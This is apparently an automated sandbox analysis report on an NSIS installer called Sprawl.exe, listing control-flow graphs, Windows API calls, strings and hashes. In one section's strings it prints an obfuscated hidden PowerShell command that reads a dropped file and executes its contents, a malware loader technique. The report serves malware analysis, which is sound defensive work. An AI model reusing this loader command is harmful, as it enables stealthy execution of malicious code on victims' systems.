                                                                                                                            • GetDlgItem.USER32(?,00000002), ref: 00403BBE
                                                                                                                            • SetClassLongA.USER32(?,000000F2,?), ref: 00403BD8
                                                                                                                            • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403C29
                                                                                                                            • GetDlgItem.USER32(?,00000003), ref: 00403CCF
                                                                                                                            • ShowWindow.USER32(00000000,?), ref: 00403CF0
                                                                                                                            • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403D02
                                                                                                                            • EnableWindow.USER32(?,?), ref: 00403D1D
                                                                                                                            • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403D33
                                                                                                                            • EnableMenuItem.USER32(00000000), ref: 00403D3A
                                                                                                                            • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403D52
                                                                                                                            • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403D65
                                                                                                                            • lstrlenA.KERNEL32(00429868,?,00429868,Vulkanbyernes Setup), ref: 00403D8E
                                                                                                                            • SetWindowTextA.USER32(?,00429868), ref: 00403D9D
                                                                                                                            • ShowWindow.USER32(?,0000000A), ref: 00403ED1
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2179993497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2179976731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180046527.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Sprawl.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                            • String ID: Vulkanbyernes Setup
                                                                                                                            • API String ID: 3282139019-4259525593
                                                                                                                            • Opcode ID: fc27e82e98cabd3308fd2f89a2a423f79f43cd40c567b8a18826c7a47723085f
                                                                                                                            • Instruction ID: 4996b7fab7fdeaebc033b1676f4cae353b3174fabf4a12f0715eb1af02f584c4
                                                                                                                            • Opcode Fuzzy Hash: fc27e82e98cabd3308fd2f89a2a423f79f43cd40c567b8a18826c7a47723085f
                                                                                                                            • Instruction Fuzzy Hash: 74C1B131A04205ABDB216F62ED85E2B7EBCFB4570AF40053EF501B11E1C739A942DB6E

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 353 4036af-4036c7 call 4060c8 356 4036c9-4036d9 call 405c8d 353->356 357 4036db-40370c call 405c16 353->357 365 40372f-403758 call 403974 call 40588f 356->365 362 403724-40372a lstrcatA 357->362 363 40370e-40371f call 405c16 357->363 362->365 363->362 371 40375e-403763 365->371 372 4037df-4037e7 call 40588f 365->372 371->372 373 403765-403789 call 405c16 371->373 378 4037f5-40381a LoadImageA 372->378 379 4037e9-4037f0 call 405d51 372->379 373->372 380 40378b-40378d 373->380 382 40389b-4038a3 call 40140b 378->382 383 40381c-40384c RegisterClassA 378->383 379->378 387 40379e-4037aa lstrlenA 380->387 388 40378f-40379c call 4057cc 380->388 395 4038a5-4038a8 382->395 396 4038ad-4038b8 call 403974 382->396 384 403852-403896 SystemParametersInfoA CreateWindowExA 383->384 385 40396a 383->385 384->382 393 40396c-403973 385->393 389 4037d2-4037da call 4057a1 call 405d2f 387->389 390 4037ac-4037ba lstrcmpiA 387->390 388->387 389->372 390->389 394 4037bc-4037c6 GetFileAttributesA 390->394 399 4037c8-4037ca 394->399 400 4037cc-4037cd call 4057e8 394->400 395->393 406 403941-403949 call 40501a 396->406 407 4038be-4038d8 ShowWindow call 40605a 396->407 399->389 399->400 400->389 412 403963-403965 call 40140b 406->412 413 40394b-403951 406->413 414 4038e4-4038f6 GetClassInfoA 407->414 415 4038da-4038df call 40605a 407->415 412->385 413->395 416 403957-40395e call 40140b 413->416 419 4038f8-403908 GetClassInfoA RegisterClassA 414->419 420 40390e-403931 DialogBoxParamA call 40140b 414->420 415->414 416->395 419->420 423 403936-40393f call 4035ff 420->423 423->393
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 004060C8: GetModuleHandleA.KERNEL32(?,?,?,00403179,00000009), ref: 004060DA
                                                                                                                              • Part of subcall function 004060C8: GetProcAddress.KERNEL32(00000000,?), ref: 004060F5
                                                                                                                            • lstrcatA.KERNEL32(1033,00429868,80000001,Control Panel\Desktop\ResourceLocale,00000000,00429868,00000000,00000002,76233410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Sprawl.exe",00000000), ref: 0040372A
                                                                                                                            • lstrlenA.KERNEL32(Space available: ,?,?,?,Space available: ,00000000,C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian,1033,00429868,80000001,Control Panel\Desktop\ResourceLocale,00000000,00429868,00000000,00000002,76233410), ref: 0040379F
                                                                                                                            • lstrcmpiA.KERNEL32(?,.exe), ref: 004037B2
                                                                                                                            • GetFileAttributesA.KERNEL32(Space available: ), ref: 004037BD
                                                                                                                            • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian), ref: 00403806
                                                                                                                              • Part of subcall function 00405C8D: wsprintfA.USER32 ref: 00405C9A
                                                                                                                            • RegisterClassA.USER32(0042DBA0), ref: 00403843
                                                                                                                            • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 0040385B
                                                                                                                            • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403890
                                                                                                                            • ShowWindow.USER32(00000005,00000000), ref: 004038C6
                                                                                                                            • GetClassInfoA.USER32(00000000,RichEdit20A,0042DBA0), ref: 004038F2
                                                                                                                            • GetClassInfoA.USER32(00000000,RichEdit,0042DBA0), ref: 004038FF
                                                                                                                            • RegisterClassA.USER32(0042DBA0), ref: 00403908
                                                                                                                            • DialogBoxParamA.USER32(?,00000000,00403A41,00000000), ref: 00403927
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2179993497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2179976731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180046527.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Sprawl.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                            • String ID: "C:\Users\user\Desktop\Sprawl.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$Space available: $_Nb
                                                                                                                            • API String ID: 1975747703-3763382298
                                                                                                                            • Opcode ID: 394e4bb129311e5b6d6d20aedec098417f6b3d3145e2df1ac527dc8f8ff082cb
                                                                                                                            • Instruction ID: 60e5f6254d87716c4f77e59e0de616dae33e132719ef70849b8472436850552a
                                                                                                                            • Opcode Fuzzy Hash: 394e4bb129311e5b6d6d20aedec098417f6b3d3145e2df1ac527dc8f8ff082cb
                                                                                                                            • Instruction Fuzzy Hash: 4161E6B07442006EE620BF269C85F373EACEB45749F50443FF945B62E2C67CAD429A2D

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 530 402c66-402cb4 GetTickCount GetModuleFileNameA call 4059a2 533 402cc0-402cee call 405d2f call 4057e8 call 405d2f GetFileSize 530->533 534 402cb6-402cbb 530->534 542 402cf4 533->542 543 402ddb-402de9 call 402c02 533->543 535 402e98-402e9c 534->535 545 402cf9-402d10 542->545 550 402deb-402dee 543->550 551 402e3e-402e43 543->551 546 402d12 545->546 547 402d14-402d1d call 4030b1 545->547 546->547 556 402d23-402d2a 547->556 557 402e45-402e4d call 402c02 547->557 553 402df0-402e08 call 4030c7 call 4030b1 550->553 554 402e12-402e3c GlobalAlloc call 4030c7 call 402e9f 550->554 551->535 553->551 576 402e0a-402e10 553->576 554->551 581 402e4f-402e60 554->581 560 402da6-402daa 556->560 561 402d2c-402d40 call 40595d 556->561 557->551 565 402db4-402dba 560->565 566 402dac-402db3 call 402c02 560->566 561->565 579 402d42-402d49 561->579 572 402dc9-402dd3 565->572 573 402dbc-402dc6 call 40613d 565->573 566->565 572->545 580 402dd9 572->580 573->572 576->551 576->554 579->565 583 402d4b-402d52 579->583 580->543 584 402e62 581->584 585 402e68-402e6d 581->585 583->565 587 402d54-402d5b 583->587 584->585 586 402e6e-402e74 585->586 586->586 588 402e76-402e91 SetFilePointer call 40595d 586->588 587->565 589 402d5d-402d64 587->589 592 402e96 588->592 589->565 591 402d66-402d86 589->591 591->551 593 402d8c-402d90 591->593 592->535 594 402d92-402d96 593->594 595 402d98-402da0 593->595 594->580 594->595 595->565 596 402da2-402da4 595->596 596->565
                                                                                                                            APIs
                                                                                                                            • GetTickCount.KERNEL32 ref: 00402C77
                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\Sprawl.exe,00000400), ref: 00402C93
                                                                                                                              • Part of subcall function 004059A2: GetFileAttributesA.KERNELBASE(00000003,00402CA6,C:\Users\user\Desktop\Sprawl.exe,80000000,00000003), ref: 004059A6
                                                                                                                              • Part of subcall function 004059A2: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004059C8
                                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,00436000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Sprawl.exe,C:\Users\user\Desktop\Sprawl.exe,80000000,00000003), ref: 00402CDF
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2179993497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2179976731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180046527.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Sprawl.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                                            • String ID: "C:\Users\user\Desktop\Sprawl.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Sprawl.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                                                                                            • API String ID: 4283519449-1144871244
                                                                                                                            • Opcode ID: 5f7c5d9e77a9b9c73338c6d1e92cd20f3f30bb0dbb8c708eeee72798782a561c
                                                                                                                            • Instruction ID: 2dd8a40a4a6da4a25a7ff80ffc2ca296f3ca1cc65932c4217ff60142993c7b59
                                                                                                                            • Opcode Fuzzy Hash: 5f7c5d9e77a9b9c73338c6d1e92cd20f3f30bb0dbb8c708eeee72798782a561c
                                                                                                                            • Instruction Fuzzy Hash: 9651F771940214ABDF20AF65DE89B9E7AA8EF04714F54803BF504B72D2C7BC9D418BAD

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 728 401751-401774 call 402a3a call 40580e 733 401776-40177c call 405d2f 728->733 734 40177e-401790 call 405d2f call 4057a1 lstrcatA 728->734 740 401795-40179b call 405f9a 733->740 734->740 744 4017a0-4017a4 740->744 745 4017a6-4017b0 call 406033 744->745 746 4017d7-4017da 744->746 754 4017c2-4017d4 745->754 755 4017b2-4017c0 CompareFileTime 745->755 748 4017e2-4017fe call 4059a2 746->748 749 4017dc-4017dd call 40597d 746->749 756 401800-401803 748->756 757 401876-40189f call 404f48 call 402e9f 748->757 749->748 754->746 755->754 758 401805-401847 call 405d2f * 2 call 405d51 call 405d2f call 405525 756->758 759 401858-401862 call 404f48 756->759 771 4018a1-4018a5 757->771 772 4018a7-4018b3 SetFileTime 757->772 758->744 792 40184d-40184e 758->792 769 40186b-401871 759->769 773 4028d8 769->773 771->772 775 4018b9-4018c4 CloseHandle 771->775 772->775 777 4028da-4028de 773->777 778 4018ca-4018cd 775->778 779 4028cf-4028d2 775->779 781 4018e2-4018e5 call 405d51 778->781 782 4018cf-4018e0 call 405d51 lstrcatA 778->782 779->773 787 4018ea-402273 call 405525 781->787 782->787 787->777 787->779 792->769 794 401850-401851 792->794 794->759
                                                                                                                            APIs
                                                                                                                            • lstrcatA.KERNEL32(00000000,00000000,"powershell.exe" -windowstyle hidden "$Sensitometer42=Get-Content -raw 'C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Paraffinerer.Dej';$Loveliest=$Sensitometer42.SubString(55162,3);.$Loveliest($Sensitometer42)",C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian,00000000,00000000,00000031), ref: 00401790
                                                                                                                            • CompareFileTime.KERNEL32(-00000014,?,"powershell.exe" -windowstyle hidden "$Sensitometer42=Get-Content -raw 'C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Paraffinerer.Dej';$Loveliest=$Sensitometer42.SubString(55162,3);.$Loveliest($Sensitometer42)","powershell.exe" -windowstyle hidden "$Sensitometer42=Get-Content -raw 'C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Paraffinerer.Dej';$Loveliest=$Sensitometer42.SubString(55162,3);.$Loveliest($Sensitometer42)",00000000,00000000,"powershell.exe" -windowstyle hidden "$Sensitometer42=Get-Content -raw 'C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Paraffinerer.Dej';$Loveliest=$Sensitometer42.SubString(55162,3);.$Loveliest($Sensitometer42)",C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian,00000000,00000000,00000031), ref: 004017BA
                                                                                                                              • Part of subcall function 00405D2F: lstrcpynA.KERNEL32(?,?,00000400,004031BD,Vulkanbyernes Setup,NSIS Error), ref: 00405D3C
                                                                                                                              • Part of subcall function 00404F48: lstrlenA.KERNEL32(00429048,00000000,0041C205,762323A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000,?), ref: 00404F81
                                                                                                                              • Part of subcall function 00404F48: lstrlenA.KERNEL32(00402FFA,00429048,00000000,0041C205,762323A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000), ref: 00404F91
                                                                                                                              • Part of subcall function 00404F48: lstrcatA.KERNEL32(00429048,00402FFA,00402FFA,00429048,00000000,0041C205,762323A0), ref: 00404FA4
                                                                                                                              • Part of subcall function 00404F48: SetWindowTextA.USER32(00429048,00429048), ref: 00404FB6
                                                                                                                              • Part of subcall function 00404F48: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FDC
                                                                                                                              • Part of subcall function 00404F48: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FF6
                                                                                                                              • Part of subcall function 00404F48: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405004
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2179993497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2179976731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180046527.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Sprawl.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                            • String ID: "powershell.exe" -windowstyle hidden "$Sensitometer42=Get-Content -raw 'C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Paraffinerer.Dej';$Loveliest=$Sensitometer42.SubString(55162,3);.$Loveliest($Sensitometer42)"$Arabisation\argumenta\dekaderne$C:\Users\user\AppData\Local\Temp\Vedlgges.Fam$C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian
                                                                                                                            • API String ID: 1941528284-2273613815
                                                                                                                            • Opcode ID: 4f9644c0113f451ee2cb14cf97c87bd5b67e16b7d88c3abb121216c9f25fe8f5
                                                                                                                            • Instruction ID: 9fffb686f64fba45267de9fcbed8a5438fb589d34f2a074259106400a528bed4
                                                                                                                            • Opcode Fuzzy Hash: 4f9644c0113f451ee2cb14cf97c87bd5b67e16b7d88c3abb121216c9f25fe8f5
                                                                                                                            • Instruction Fuzzy Hash: 1041B831900519BBDF107BA5DC85EAF3679DF45368B60863BF121F11E1D63C8A418A6D

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 795 402e9f-402eb3 796 402eb5 795->796 797 402ebc-402ec5 795->797 796->797 798 402ec7 797->798 799 402ece-402ed3 797->799 798->799 800 402ee3-402ef0 call 4030b1 799->800 801 402ed5-402ede call 4030c7 799->801 805 402ef6-402efa 800->805 806 40309f 800->806 801->800 807 402f00-402f49 GetTickCount 805->807 808 40304a-40304c 805->808 809 4030a1-4030a2 806->809 812 4030a7 807->812 813 402f4f-402f57 807->813 810 40308c-40308f 808->810 811 40304e-403051 808->811 814 4030aa-4030ae 809->814 815 403091 810->815 816 403094-40309d call 4030b1 810->816 811->812 817 403053 811->817 812->814 818 402f59 813->818 819 402f5c-402f6a call 4030b1 813->819 815->816 816->806 827 4030a4 816->827 821 403056-40305c 817->821 818->819 819->806 829 402f70-402f79 819->829 824 403060-40306e call 4030b1 821->824 825 40305e 821->825 824->806 833 403070-40307c call 405a49 824->833 825->824 827->812 830 402f7f-402f9f call 4061ab 829->830 837 403042-403044 830->837 838 402fa5-402fb8 GetTickCount 830->838 839 403046-403048 833->839 840 40307e-403088 833->840 837->809 841 402fba-402fc2 838->841 842 402ffd-402fff 838->842 839->809 840->821 843 40308a 840->843 844 402fc4-402fc8 841->844 845 402fca-402ffa MulDiv wsprintfA call 404f48 841->845 846 403001-403005 842->846 847 403036-40303a 842->847 843->812 844->842 844->845 845->842 850 403007-40300e call 405a49 846->850 851 40301c-403027 846->851 847->813 848 403040 847->848 848->812 856 403013-403015 850->856 852 40302a-40302e 851->852 852->830 855 403034 852->855 855->812 856->839 857 403017-40301a 856->857 857->852
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2179993497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2179976731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180046527.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Sprawl.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CountTick$wsprintf
                                                                                                                            • String ID: DA$ DA$... %d%%$DwA
                                                                                                                            • API String ID: 551687249-506594815
                                                                                                                            • Opcode ID: 3c1c6048edc1f00d8c5e0ea3695652e11966b85d101879319fc20926b17e4e8a
                                                                                                                            • Instruction ID: 91ee06cea14faca46f7a5a314d1b96781db6e884ff6161e1c143c8ea96f9570f
                                                                                                                            • Opcode Fuzzy Hash: 3c1c6048edc1f00d8c5e0ea3695652e11966b85d101879319fc20926b17e4e8a
                                                                                                                            • Instruction Fuzzy Hash: FB51907190120A9BDB10DF65EA44B9F7BB8EF44756F10813BE800B72C4D7788E51DBAA

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 858 40540e-405459 CreateDirectoryA 859 40545b-40545d 858->859 860 40545f-40546c GetLastError 858->860 861 405486-405488 859->861 860->861 862 40546e-405482 SetFileSecurityA 860->862 862->859 863 405484 GetLastError 862->863 863->861
                                                                                                                            APIs
                                                                                                                            • CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405451
                                                                                                                            • GetLastError.KERNEL32 ref: 00405465
                                                                                                                            • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 0040547A
                                                                                                                            • GetLastError.KERNEL32 ref: 00405484
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2179993497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2179976731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180046527.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Sprawl.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$ds@$ts@
                                                                                                                            • API String ID: 3449924974-3329011080
                                                                                                                            • Opcode ID: f69d3160a82a2859f106a017fa20b71bd819ec85ae22b078452fa26fbc967781
                                                                                                                            • Instruction ID: 7d6f839e8d8492d35463ff02b487d6c5a8d89e3dbffb35ab490880a12e6152a5
                                                                                                                            • Opcode Fuzzy Hash: f69d3160a82a2859f106a017fa20b71bd819ec85ae22b078452fa26fbc967781
                                                                                                                            • Instruction Fuzzy Hash: B4010871D14259EADF11DBA0C9447EFBFB8EB14355F004176E905B6280E378A644CFAA

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 864 40605a-40607a GetSystemDirectoryA 865 40607c 864->865 866 40607e-406080 864->866 865->866 867 406090-406092 866->867 868 406082-40608a 866->868 870 406093-4060c5 wsprintfA LoadLibraryExA 867->870 868->867 869 40608c-40608e 868->869 869->870
                                                                                                                            APIs
                                                                                                                            • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00406071
                                                                                                                            • wsprintfA.USER32 ref: 004060AA
                                                                                                                            • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004060BE
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2179993497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2179976731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180046527.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
